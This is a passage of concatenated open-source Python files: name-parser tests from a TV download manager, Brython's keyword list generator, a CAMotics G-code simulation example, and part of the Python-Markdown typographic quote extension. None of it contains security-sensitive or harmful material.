'Show Name - 1x02 - My Ep Name': parser.ParseResult(None, 'Show Name', 1, [2], 'My Ep Name'),
'Show_Name.1x02x03x04.Source_Quality_Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'Source_Quality_Etc', 'Group'),
'Show Name - 1x02-03-04 - My Ep Name': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'My Ep Name'),
'1x02 Ep Name': parser.ParseResult(None, None, 1, [2], 'Ep Name'),
'Show-Name-1x02-720p': parser.ParseResult(None, 'Show-Name', 1, [2], '720p'),
'Show-Name-1x02-1080i': parser.ParseResult(None, 'Show-Name', 1, [2], '1080i'),
'Show Name [05x12] Ep Name': parser.ParseResult(None, 'Show Name', 5, [12], 'Ep Name'),
'Show.Name.1x02.WEB-DL': parser.ParseResult(None, 'Show Name', 1, [2], 'WEB-DL')
},
'standard_repeat': {
'Show.Name.S01E02.S01E03.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'Source.Quality.Etc', 'Group'),
'Show.Name.S01E02.S01E03': parser.ParseResult(None, 'Show Name', 1, [2, 3]),
'Show Name - S01E02 - S01E03 - S01E04 - Ep Name': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'Ep Name'),
'Show.Name.S01E02.S01E03.WEB-DL': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'WEB-DL')
},
'fov_repeat': {
'Show.Name.1x02.1x03.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'Source.Quality.Etc', 'Group'),
'Show.Name.1x02.1x03': parser.ParseResult(None, 'Show Name', 1, [2, 3]),
'Show Name - 1x02 - 1x03 - 1x04 - Ep Name': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'Ep Name'),
'Show.Name.1x02.1x03.WEB-DL': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'WEB-DL')
},
'bare': {
'Show.Name.102.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2], 'Source.Quality.Etc', 'Group'),
'show.name.2010.123.source.quality.etc-group': parser.ParseResult(None, 'show name 2010', 1, [23], 'source.quality.etc', 'group'),
'show.name.2010.222.123.source.quality.etc-group': parser.ParseResult(None, 'show name 2010.222', 1, [23], 'source.quality.etc', 'group'),
'Show.Name.102': parser.ParseResult(None, 'Show Name', 1, [2]),
'the.event.401.hdtv-group': parser.ParseResult(None, 'the event', 4, [1], 'hdtv', 'group'),
'show.name.2010.special.hdtv-blah': None,
'show.ex-name.102.hdtv-group': parser.ParseResult(None, 'show ex-name', 1, [2], 'hdtv', 'group'),
},
'stupid': {
'tpz-abc102': parser.ParseResult(None, None, 1, [2], None, 'tpz'),
'tpz-abc.102': parser.ParseResult(None, None, 1, [2], None, 'tpz')
},
'no_season': {
'Show Name - 01 - Ep Name': parser.ParseResult(None, 'Show Name', None, [1], 'Ep Name'),
'01 - Ep Name': parser.ParseResult(None, None, None, [1], 'Ep Name'),
'Show Name - 01 - Ep Name - WEB-DL': parser.ParseResult(None, 'Show Name', None, [1], 'Ep Name - WEB-DL')
},
'no_season_general': {
'Show.Name.E23.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [23], 'Source.Quality.Etc', 'Group'),
'Show Name - Episode 01 - Ep Name': parser.ParseResult(None, 'Show Name', None, [1], 'Ep Name'),
'Show.Name.Part.3.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [3], 'Source.Quality.Etc', 'Group'),
'Show.Name.Part.1.and.Part.2.Blah-Group': parser.ParseResult(None, 'Show Name', None, [1, 2], 'Blah', 'Group'),
'Show.Name.Part.IV.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [4], 'Source.Quality.Etc', 'Group'),
'Deconstructed.E07.1080i.HDTV.DD5.1.MPEG2-TrollHD': parser.ParseResult(None, 'Deconstructed', None, [7], '1080i.HDTV.DD5.1.MPEG2', 'TrollHD'),
'Show.Name.E23.WEB-DL': parser.ParseResult(None, 'Show Name', None, [23], 'WEB-DL'),
},
'no_season_multi_ep': {
'Show.Name.E23-24.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [23, 24], 'Source.Quality.Etc', 'Group'),
'Show Name - Episode 01-02 - Ep Name': parser.ParseResult(None, 'Show Name', None, [1, 2], 'Ep Name'),
'Show.Name.E23-24.WEB-DL': parser.ParseResult(None, 'Show Name', None, [23, 24], 'WEB-DL')
},
'season_only': {
'Show.Name.S02.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 2, [], 'Source.Quality.Etc', 'Group'),
'Show Name Season 2': parser.ParseResult(None, 'Show Name', 2),
'Season 02': parser.ParseResult(None, None, 2)
},
'scene_date_format': {
'Show.Name.2010.11.23.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [], 'Source.Quality.Etc', 'Group', datetime.date(2010, 11, 23)),
'Show Name - 2010.11.23': parser.ParseResult(None, 'Show Name', air_date=datetime.date(2010, 11, 23)),
'Show.Name.2010.23.11.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [], 'Source.Quality.Etc', 'Group', datetime.date(2010, 11, 23)),
'Show Name - 2010-11-23 - Ep Name': parser.ParseResult(None, 'Show Name', extra_info='Ep Name', air_date=datetime.date(2010, 11, 23)),
'2010-11-23 - Ep Name': parser.ParseResult(None, extra_info='Ep Name', air_date=datetime.date(2010, 11, 23)),
'Show.Name.2010.11.23.WEB-DL': parser.ParseResult(None, 'Show Name', None, [], 'WEB-DL', None, datetime.date(2010, 11, 23))
},
}
combination_test_cases = [
('/test/path/to/Season 02/03 - Ep Name.avi',
parser.ParseResult(None, None, 2, [3], 'Ep Name'),
['no_season', 'season_only']),
('Show.Name.S02.Source.Quality.Etc-Group/tpz-sn203.avi',
parser.ParseResult(None, 'Show Name', 2, [3], 'Source.Quality.Etc', 'Group'),
['stupid', 'season_only']),
('MythBusters.S08E16.720p.HDTV.x264-aAF/aaf-mb.s08e16.720p.mkv',
parser.ParseResult(None, 'MythBusters', 8, [16], '720p.HDTV.x264', 'aAF'),
['standard']),
('/home/drop/storage/TV/Terminator The Sarah Connor Chronicles/Season 2/S02E06 The Tower is Tall, But the Fall is Short.mkv',
parser.ParseResult(None, None, 2, [6], 'The Tower is Tall, But the Fall is Short'),
['standard']),
(r'/Test/TV/Jimmy Fallon/Season 2/Jimmy Fallon - 2010-12-15 - blah.avi',
parser.ParseResult(None, 'Jimmy Fallon', extra_info='blah', air_date=datetime.date(2010, 12, 15)),
['scene_date_format']),
(r'/X/30 Rock/Season 4/30 Rock - 4x22 -.avi',
parser.ParseResult(None, '30 Rock', 4, [22]),
['fov']),
('Season 2\\Show Name - 03-04 - Ep Name.ext',
parser.ParseResult(None, 'Show Name', 2, [3, 4], extra_info='Ep Name'),
['no_season', 'season_only']),
('Season 02\\03-04-05 - Ep Name.ext',
parser.ParseResult(None, None, 2, [3, 4, 5], extra_info='Ep Name'),
['no_season', 'season_only']),
]
unicode_test_cases = [
(u'The.Big.Bang.Theory.2x07.The.Panty.Pi\xf1ata.Polarization.720p.HDTV.x264.AC3-SHELDON.mkv',
parser.ParseResult(None, 'The.Big.Bang.Theory', 2, [7], u'The.Panty.Pi\xf1ata.Polarization.720p.HDTV.x264.AC3', 'SHELDON')),
('The.Big.Bang.Theory.2x07.The.Panty.Pi\xc3\xb1ata.Polarization.720p.HDTV.x264.AC3-SHELDON.mkv',
parser.ParseResult(None, 'The.Big.Bang.Theory', 2, [7], u'The.Panty.Pi\xf1ata.Polarization.720p.HDTV.x264.AC3', 'SHELDON'))
]
failure_cases = ['7sins-jfcs01e09-720p-bluray-x264']
class UnicodeTests(test.SiCKRAGETestDBCase):
def __init__(self, something):
super(UnicodeTests, self).__init__(something)
super(UnicodeTests, self).setUp()
self.show = tv.TVShow(1, 1, 'en')
self.show.name = "The Big Bang Theory"
def _test_unicode(self, name, result):
np = parser.NameParser(True, showObj=self.show)
parse_result = np.parse(name)
# this shouldn't raise an exception
repr(str(parse_result))
self.assertEqual(parse_result.extra_info, result.extra_info)
def test_unicode(self):
for (name, result) in unicode_test_cases:
self._test_unicode(name, result)
class FailureCaseTests(test.SiCKRAGETestDBCase):
@staticmethod
def _test_name(name):
np = parser.NameParser(True)
try:
parse_result = np.parse(name)
except (parser.InvalidNameException, parser.InvalidShowException):
return True
if VERBOSE:
print 'Actual: ', parse_result.which_regex, parse_result
return False
def test_failures(self):
for name in failure_cases:
self.assertTrue(self._test_name(name))
class ComboTests(test.SiCKRAGETestDBCase):
def _test_combo(self, name, result, which_regexes):
if VERBOSE:
print
print 'Testing', name
np = parser.NameParser(True)
try:
test_result = np.parse(name)
except parser.InvalidShowException:
return False
if DEBUG:
print test_result, test_result.which_regex
print result, which_regexes
self.assertEqual(test_result, result)
for cur_regex in which_regexes:
self.assertTrue(cur_regex in test_result.which_regex)
self.assertEqual(len(which_regexes), len(test_result.which_regex))
def test_combos(self):
for (name, result, which_regexes) in combination_test_cases:
# Normalise the paths. Converts UNIX-style paths into Windows-style
# paths when test is run on Windows.
self._test_combo(ek(os.path.normpath, name), result, which_regexes)
class BasicTests(test.SiCKRAGETestDBCase):
def __init__(self, something):
super(BasicTests, self).__init__(something)
super(BasicTests, self).setUp()
self.show = tv.TVShow(1, 1, 'en')
def _test_names(self, np, section, transform=None, verbose=False):
if VERBOSE or verbose:
print
print 'Running', section, 'tests'
for cur_test_base in simple_test_cases[section]:
if transform:
cur_test = transform(cur_test_base)
np.file_name = cur_test
else:
cur_test = cur_test_base
if VERBOSE or verbose:
print 'Testing', cur_test
result = simple_test_cases[section][cur_test_base]
self.show.name = result.series_name if result else None
np.showObj = self.show
if not result:
self.assertRaises(parser.InvalidNameException, np.parse, cur_test)
continue  # keep checking the remaining cases in this section
else:
result.which_regex = [section]
test_result = np.parse(cur_test)
if DEBUG or verbose:
print 'air_by_date:', test_result.is_air_by_date, 'air_date:', test_result.air_date
print 'anime:', test_result.is_anime, 'ab_episode_numbers:', test_result.ab_episode_numbers
print test_result
print result
self.assertEqual(test_result.which_regex, [section])
self.assertEqual(str(test_result), str(result))
def test_standard_names(self):
np = parser.NameParser(True)
self._test_names(np, 'standard')
def test_standard_repeat_names(self):
np = parser.NameParser(False)
self._test_names(np, 'standard_repeat')
def test_fov_names(self):
np = parser.NameParser(False)
self._test_names(np, 'fov')
def test_fov_repeat_names(self):
np = parser.NameParser(False)
self._test_names(np, 'fov_repeat')
#def test_bare_names(self):
# np = parser.NameParser(False)
# self._test_names(np, 'bare')
def test_stupid_names(self):
np = parser.NameParser(False)
self._test_names(np, 'stupid')
#def test_no_season_names(self):
# np = parser.NameParser(False)
# self._test_names(np, 'no_season')
def test_no_season_general_names(self):
np = parser.NameParser(False)
self._test_names(np, 'no_season_general')
def test_no_season_multi_ep_names(self):
np = parser.NameParser(False)
self._test_names(np, 'no_season_multi_ep')
def test_season_only_names(self):
np = parser.NameParser(False)
self._test_names(np, 'season_only')
#def test_scene_date_format_names(self):
# np = parser.NameParser(False)
# self._test_names(np, 'scene_date_format')
def test_standard_file_names(self):
np = parser.NameParser()
self._test_names(np, 'standard', lambda x: x + '.avi')
def test_standard_repeat_file_names(self):
np = parser.NameParser()
self._test_names(np, 'standard_repeat', lambda x: x + '.avi')
def test_fov_file_names(self):
np = parser.NameParser()
self._test_names(np, 'fov', lambda x: x + '.avi')
def test_fov_repeat_file_names(self):
np = parser.NameParser()
self._test_names(np, 'fov_repeat', lambda x: x + '.avi')
#def test_bare_file_names(self):
# np = parser.NameParser()
# self._test_names(np, 'bare', lambda x: x + '.avi')
def test_stupid_file_names(self):
np = parser.NameParser()
self._test_names(np, 'stupid', lambda x: x + '.avi')
#def test_no_season_file_names(self):
# np = parser.NameParser()
# self._test_names(np, 'no_season', lambda x: x + '.avi')
def test_no_season_general_file_names(self):
np = parser.NameParser()
self._test_names(np, 'no_season_general', lambda x: x + '.avi')
def test_no_season_multi_ep_file_names(self):
np = parser.NameParser()
self._test_names(np, 'no_season_multi_ep', lambda x: x + '.avi')
def test_season_only_file_names(self):
np = parser.NameParser()
self._test_names(np, 'season_only', lambda x: x + '.avi')
#def test_scene_date_format_file_names(self):
# np = parser.NameParser()
# self._test_names(np, 'scene_date_format', lambda x: x + '.avi')
def test_combination_names(self):
pass
if __name__ == '__main__':
print "=================="
print "STARTING - NAME PARSER TESTS"
print "=================="
print "######################################################################"
if len(sys.argv) > 1:
suite = unittest.TestLoader().loadTestsFromName('name_parser_tests.BasicTests.test_'+sys.argv[1])
unittest.TextTestRunner(verbosity=2).run(suite)
else:
suite = unittest.TestLoader().loadTestsFromTestCase(BasicTests)
unittest.TextTestRunner(verbosity=2).run(suite)
print "######################################################################"
suite = unittest.TestLoader().loadTestsFromTestCase(ComboTests)
unittest.TextTestRunner(verbosity=2).run(suite)
print "######################################################################"
suite = unittest.TestLoader().loadTestsFromTestCase(UnicodeTests)
unittest.TextTestRunner(verbosity=2).run(suite)
print "######################################################################"
suite = unittest.TestLoader().loadTestsFromTestCase(FailureCaseTests)
unittest.TextTestRunner(verbosity=2).run(suite)
| gpl-3.0 |
2014c2g3/0623exam | static/Brython3.1.1-20150328-091302/Lib/keyword_1.py | 761 | 2049 | #! /usr/bin/env python3
"""Keywords (from "graminit.c")
This file is automatically generated; please don't muck it up!
To update the symbols in this file, 'cd' to the top directory of
the python source tree after building the interpreter and run:
./python Lib/keyword.py
"""
__all__ = ["iskeyword", "kwlist"]
kwlist = [
#--start keywords--
'False',
'None',
'True',
'and',
'as',
'assert',
'break',
'class',
'continue',
'def',
'del',
'elif',
'else',
'except',
'finally',
'for',
'from',
'global',
'if',
'import',
'in',
'is',
'lambda',
'nonlocal',
'not',
'or',
'pass',
'raise',
'return',
'try',
'while',
'with',
'yield',
#--end keywords--
]
iskeyword = frozenset(kwlist).__contains__
def main():
import sys, re
args = sys.argv[1:]
iptfile = args and args[0] or "Python/graminit.c"
if len(args) > 1: optfile = args[1]
else: optfile = "Lib/keyword.py"
# scan the source file for keywords
with open(iptfile) as fp:
strprog = re.compile('"([^"]+)"')
lines = []
for line in fp:
if '{1, "' in line:
match = strprog.search(line)
if match:
lines.append(" '" + match.group(1) + "',\n")
lines.sort()
# load the output skeleton from the target
with open(optfile) as fp:
format = fp.readlines()
# insert the lines of keywords
try:
start = format.index("#--start keywords--\n") + 1
end = format.index("#--end keywords--\n")
format[start:end] = lines
except ValueError:
sys.stderr.write("target does not contain format markers\n")
sys.exit(1)
# write the output file
with open(optfile, 'w') as fp:
fp.write(''.join(format))
if __name__ == "__main__":
main()
| gpl-3.0 |
CauldronDevelopmentLLC/OpenSCAM | examples/python/camotics_python_example.py | 1 | 7363 | #!/usr/bin/env python3
#
# CAMotics is an Open-Source simulation and CAM software.
# Copyright (C) 2011-2021 Joseph Coffland <joseph@cauldrondevelopment.com>
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file is an example showing how to run a CAMotics simulation from Python
import camotics
import time
import signal
import sys
# Example GCode which cuts out a scorpion
gcode = '''
G21
T1M6
G0Z10.000
G0X0.000Y0.000S10000M3
G0X40.094Y235.389Z5.000
G1Z-3.000F600.0
G1X39.594Y234.826F1800.0
X33.059Y225.446
X29.088Y209.687
X29.338Y187.488
X32.027Y174.419
X36.905Y168.040
X38.969Y159.598
X46.473Y148.999
X55.665Y143.089
X61.856Y141.870
X68.047Y138.962
X78.027Y141.964
X88.870Y151.907
X91.496Y155.096
X100.877Y152.845
X97.312Y145.903
X90.934Y143.277
X83.993Y136.523
X68.047Y135.023
X63.544Y134.710
X56.884Y136.617
X47.223Y137.461
X40.845Y139.150
X35.404Y139.400
X32.965Y139.712
X32.965Y136.242
X46.848Y134.835
X62.606Y131.458
X74.881Y129.957
X82.679Y131.833
X91.497Y135.023
X97.312Y140.275
X99.563Y141.588
X101.252Y138.587
X100.501Y134.835
X95.624Y134.272
X91.403Y129.957
X76.864Y121.984
X62.231Y120.859
X47.926Y121.328
X43.283Y122.547
X33.528Y127.331
X31.277Y128.644
X29.401Y123.016
X28.557Y121.140
X39.344Y119.639
X55.477Y116.450
X73.675Y116.075
X89.433Y121.328
X96.499Y126.768
X100.501Y127.894
X99.845Y123.298
X92.435Y120.015
X88.589Y113.824
X79.115Y104.256
X75.926Y96.752
X58.979Y96.002
X53.977Y96.189
X44.221Y98.159
X33.716Y102.380
X26.212Y105.569
X24.336Y100.504
X33.153Y99.941
X39.907Y96.940
X50.225Y92.437
X58.104Y92.062
X65.561Y91.030
X75.644Y92.906
X83.430Y95.251
X89.433Y102.755
X92.059Y110.447
X97.875Y114.574
X96.562Y105.382
X93.842Y105.007
X92.622Y104.631
X89.621Y97.221
X88.964Y89.248
X83.805Y78.930
X81.929Y73.865
X75.082Y68.190
X67.296Y58.857
X58.760Y63.172
X49.287Y67.862
X40.845Y71.332
X36.155Y71.239
X34.279Y68.049
X44.409Y67.862
X53.977Y62.609
X58.667Y58.669
X63.169Y54.917
X70.298Y52.479
X85.118Y66.361
X86.807Y71.801
X91.497Y82.119
X92.059Y92.062
X93.185Y93.188
Y79.743
X97.312Y66.173
X101.252Y58.763
X104.159Y51.165
X111.070Y41.285
X121.513Y30.154
X132.206Y19.273
X146.088Y11.957
X160.909Y7.924
X173.478Y7.079
X183.045Y9.143
X193.739Y15.146
X197.960Y21.525
X196.928Y30.529
X187.226Y42.589
X180.419Y52.854
X178.355Y61.296
X174.979Y54.355
X176.479Y36.533
X183.608Y20.211
X182.389Y17.397
X169.726Y18.898
X162.972Y16.741
X156.312Y22.181
X144.775Y23.776
X138.584Y31.749
X132.018Y34.281
X128.266Y39.440
X123.326Y42.223
X121.325Y50.040
X129.767Y67.862
X134.457Y84.183
Y90.937
X138.115Y86.997
X140.835Y73.677
X153.029Y60.358
X157.907Y59.232
X165.786Y64.110
X173.290Y72.427
X182.670Y76.491
X190.268Y76.116
X191.487Y79.493
X176.542Y77.680
X166.255Y70.394
X160.533Y64.297
X153.092Y67.987
X147.214Y73.302
X144.400Y83.620
X141.586Y89.623
X140.460Y95.627
X136.521Y99.379
X134.082Y100.598
X133.144Y110.259
X133.707Y111.385
X138.959Y105.194
X143.274Y100.879
X147.120Y98.816
X151.341Y96.752
X162.785Y94.970
X171.508Y92.719
X178.824Y94.782
X190.174Y95.251
X198.241Y90.374
X199.929Y95.064
X185.484Y97.878
X176.198Y97.315
X164.379Y97.409
X153.874Y102.286
X148.339Y102.568
X141.211Y111.385
X137.771Y115.012
X133.144Y118.326
X130.893Y121.140
X130.330Y124.329
X134.832Y121.515
X139.428Y119.827
X149.840Y113.261
X155.281Y111.885
X161.873Y110.447
X172.602Y111.823
X179.997Y111.338
X184.921Y112.323
X193.739Y112.573
X201.055Y110.447
X201.430Y115.325
X191.112Y114.387
X180.794Y115.512
X172.399Y115.887
X159.327Y117.763
X154.718
X147.589Y123.673
X140.554Y126.768
X135.020Y132.209
X130.142Y133.522
X129.017Y142.996
X134.082Y143.089
X138.021Y139.713
X146.839Y138.212
X155.281Y133.147
X161.284Y133.522
X168.975Y130.145
X174.228Y127.456
X180.794Y120.953
X183.608Y123.766
X174.979Y131.646
X164.098Y134.741
X157.719Y137.555
X150.122Y140.651
X139.710Y144.872
X134.269Y145.340
X130.142Y150.781
X137.021Y152.782
X142.149Y150.593
X149.277Y143.465
X162.972Y140.088
X171.039Y142.151
X180.044Y145.903
X191.300Y156.597
X193.832Y165.226
X201.055Y174.981
X206.120Y189.802
X205.772Y207.597
X200.867Y223.945
X195.427Y232.762
X194.489Y216.253
X191.300Y200.120
X192.050Y229.010
X188.157Y202.652
X187.735Y192.991
X182.952Y186.144
X183.233Y177.795
X189.987Y168.228
X186.891Y164.570
X175.729Y160.349
X170.851Y155.283
X170.101Y149.468
X165.724Y150.030
X155.281Y157.159
X142.524Y158.379
X137.083Y162.037
X136.333Y164.007
X126.203Y156.221
X123.107Y155.846
X122.638Y155.096
X120.293Y160.818
X117.761Y161.943
X117.010Y155.096
X113.258Y156.034
X114.196Y161.287
X111.945
X107.818Y153.970
X102.040Y159.973
X93.935Y165.320
X92.247Y165.414
X91.403Y161.849
X86.181Y159.223
X68.234Y154.158
X59.980Y150.687
X57.541Y153.220
X54.633Y159.786
X44.484Y166.127
X40.469Y172.355
X48.818Y182.861
X51.350Y191.115
X44.972Y203.872
X40.845Y231.637
X40.657Y213.439
X39.391Y224.695
X40.094Y235.389
G0Z5.000
G0X0.000Y0.000Z10.000
G0Z10.000
G0X0Y0
M30
'''
def signal_handler(sig, frame):
print('interrupted')
s.interrupt()
s.wait()
old_handler(sig, frame)
def callback(status, progress):
print('%s %0.1f%%' % (status, progress * 100))
# Replace the CTRL-C interrupt handler so we can shutdown the background
# thread gracefully.
old_handler = signal.signal(signal.SIGINT, signal_handler)
print('CAMotics version %d.%d.%d' % camotics.VERSION)
# Create the simulation
s = camotics.Simulation()
s.set_metric()
s.set_workpiece(min = (0, 0, -3), max = (216, 248, 0))
s.set_tool(1, metric = True, shape = 'cylindrical', length = 12.7, diameter = 1)
s.set_resolution('high')
# Alternatively you can open a CAMotics simulation file
# s.open('examples/camotics/camotics.camotics')
# Compute the tool path from the GCode and wait for it to finish
s.compute_path(gcode)
s.wait() # Must be called to clean up the background thread
# The tool path can be accessed
path = s.get_path()
total = sum(step['time'] for step in path)
print('Total time %0.2fs' % total)
# Alternatively, you can set the tool path with s.set_path(path) using
# the same path format that get_path() returns.
# Start the simulation, passing a progress callback function
s.start(callback, done = lambda x: print('success=%s' % x))
while s.is_running():
# Do other stuff here
time.sleep(0.25)
# Wait for the simulation to complete
s.wait() # Must be called to clean up the background thread
# Get the computed surface in STL ASCII format
# The surface can be accessed in STL 'ascii', STL 'binary' or 'python' format.
print('Writing surface STL')
surface = s.get_surface('ascii')
with open('test.stl', 'wb') as f:
f.write(surface)
# Alternatively, write the STL directly to a file with s.write_surface(). This
# will be much faster as it avoid converting the data.
# Print some information about the simulation we just ran.
print(s.is_metric())
print(s.get_tools())
print(s.get_resolution())
print(s.get_workpiece())
| gpl-2.0 |
steventimberman/masterDebater | venv/lib/python2.7/site-packages/markdown/extensions/smarty.py | 62 | 10360 | # -*- coding: utf-8 -*-
'''
Smarty extension for Python-Markdown
====================================
Adds conversion of ASCII dashes, quotes and ellipses to their HTML
entity equivalents.
See <https://pythonhosted.org/Markdown/extensions/smarty.html>
for documentation.
Author: 2013, Dmitry Shachnev <mitya57@gmail.com>
All changes Copyright 2013-2014 The Python Markdown Project
License: [BSD](http://www.opensource.org/licenses/bsd-license.php)
SmartyPants license:
Copyright (c) 2003 John Gruber <http://daringfireball.net/>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name "SmartyPants" nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
smartypants.py license:
smartypants.py is a derivative work of SmartyPants.
Copyright (c) 2004, 2007 Chad Miller <http://web.chad.org/>
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
'''
from __future__ import unicode_literals
from . import Extension
from ..inlinepatterns import HtmlPattern, HTML_RE
from ..odict import OrderedDict
from ..treeprocessors import InlineProcessor
# Constants for quote education.
punctClass = r"""[!"#\$\%'()*+,-.\/:;<=>?\@\[\\\]\^_`{|}~]"""
endOfWordClass = r"[\s.,;:!?)]"
closeClass = "[^\ \t\r\n\[\{\(\-\u0002\u0003]"
openingQuotesBase = (
'(\s' # a whitespace char
'|&nbsp;' # or a non-breaking space entity
'|--' # or dashes
'|–|—' # or unicode
'|&[mn]dash;' # or named dash entities
'|&#8211;|&#8212;' # or decimal entities
')'
)
substitutions = {
'mdash': '&mdash;',
'ndash': '&ndash;',
'ellipsis': '&hellip;',
'left-angle-quote': '&laquo;',
'right-angle-quote': '&raquo;',
'left-single-quote': '&lsquo;',
'right-single-quote': '&rsquo;',
'left-double-quote': '&ldquo;',
'right-double-quote': '&rdquo;',
}
# Special case if the very first character is a quote
# followed by punctuation at a non-word-break. Close the quotes by brute force:
singleQuoteStartRe = r"^'(?=%s\B)" % punctClass
doubleQuoteStartRe = r'^"(?=%s\B)' % punctClass
# Special case for double sets of quotes, e.g.:
# <p>He said, "'Quoted' words in a larger quote."</p>
doubleQuoteSetsRe = r""""'(?=\w)"""
singleQuoteSetsRe = r"""'"(?=\w)"""
# Special case for decade abbreviations (the '80s):
decadeAbbrRe = r"(?<!\w)'(?=\d{2}s)"
# Get most opening double quotes:
openingDoubleQuotesRegex = r'%s"(?=\w)' % openingQuotesBase
# Double closing quotes:
closingDoubleQuotesRegex = r'"(?=\s)'
closingDoubleQuotesRegex2 = '(?<=%s)"' % closeClass
# Get most opening single quotes:
openingSingleQuotesRegex = r"%s'(?=\w)" % openingQuotesBase
# Single closing quotes:
closingSingleQuotesRegex = r"(?<=%s)'(?!\s|s\b|\d)" % closeClass
closingSingleQuotesRegex2 = r"(?<=%s)'(\s|s\b)" % closeClass
# All remaining quotes should be opening ones
remainingSingleQuotesRegex = "'"
remainingDoubleQuotesRegex = '"'
HTML_STRICT_RE = HTML_RE + r'(?!\>)'
class SubstituteTextPattern(HtmlPattern):
def __init__(self, pattern, replace, markdown_instance):
""" Replaces matches with some text. """
HtmlPattern.__init__(self, pattern)
self.replace = replace
self.markdown = markdown_instance
def handleMatch(self, m):
result = ''
for part in self.replace:
if isinstance(part, int):
result += m.group(part)
else:
result += self.markdown.htmlStash.store(part, safe=True)
return result
class SmartyExtension(Extension):
def __init__(self, *args, **kwargs):
self.config = {
'smart_quotes': [True, 'Educate quotes'],
'smart_angled_quotes': [False, 'Educate angled quotes'],
'smart_dashes': [True, 'Educate dashes'],
'smart_ellipses': [True, 'Educate ellipses'],
'substitutions': [{}, 'Overwrite default substitutions'],
}
super(SmartyExtension, self).__init__(*args, **kwargs)
self.substitutions = dict(substitutions)
self.substitutions.update(self.getConfig('substitutions', default={}))
def _addPatterns(self, md, patterns, serie):
for ind, pattern in enumerate(patterns):
pattern += (md,)
pattern = SubstituteTextPattern(*pattern)
after = ('>smarty-%s-%d' % (serie, ind - 1) if ind else '_begin')
name = 'smarty-%s-%d' % (serie, ind)
self.inlinePatterns.add(name, pattern, after)
def educateDashes(self, md):
emDashesPattern = SubstituteTextPattern(
r'(?<!-)---(?!-)', (self.substitutions['mdash'],), md
)
enDashesPattern = SubstituteTextPattern(
r'(?<!-)--(?!-)', (self.substitutions['ndash'],), md
)
self.inlinePatterns.add('smarty-em-dashes', emDashesPattern, '_begin')
self.inlinePatterns.add(
'smarty-en-dashes', enDashesPattern, '>smarty-em-dashes'
)
def educateEllipses(self, md):
ellipsesPattern = SubstituteTextPattern(
r'(?<!\.)\.{3}(?!\.)', (self.substitutions['ellipsis'],), md
)
self.inlinePatterns.add('smarty-ellipses', ellipsesPattern, '_begin')
def educateAngledQuotes(self, md):
leftAngledQuotePattern = SubstituteTextPattern(
r'\<\<', (self.substitutions['left-angle-quote'],), md
)
rightAngledQuotePattern = SubstituteTextPattern(
r'\>\>', (self.substitutions['right-angle-quote'],), md
)
self.inlinePatterns.add(
'smarty-left-angle-quotes', leftAngledQuotePattern, '_begin'
)
self.inlinePatterns.add(
'smarty-right-angle-quotes',
rightAngledQuotePattern,
'>smarty-left-angle-quotes'
)
def educateQuotes(self, md):
lsquo = self.substitutions['left-single-quote']
rsquo = self.substitutions['right-single-quote']
ldquo = self.substitutions['left-double-quote']
rdquo = self.substitutions['right-double-quote']
patterns = (
(singleQuoteStartRe, (rsquo,)),
(doubleQuoteStartRe, (rdquo,)),
(doubleQuoteSetsRe, (ldquo + lsquo,)),
(singleQuoteSetsRe, (lsquo + ldquo,)),
(decadeAbbrRe, (rsquo,)),
(openingSingleQuotesRegex, (2, lsquo)),
(closingSingleQuotesRegex, (rsquo,)),
(closingSingleQuotesRegex2, (rsquo, 2)),
(remainingSingleQuotesRegex, (lsquo,)),
(openingDoubleQuotesRegex, (2, ldquo)),
(closingDoubleQuotesRegex, (rdquo,)),
(closingDoubleQuotesRegex2, (rdquo,)),
(remainingDoubleQuotesRegex, (ldquo,))
)
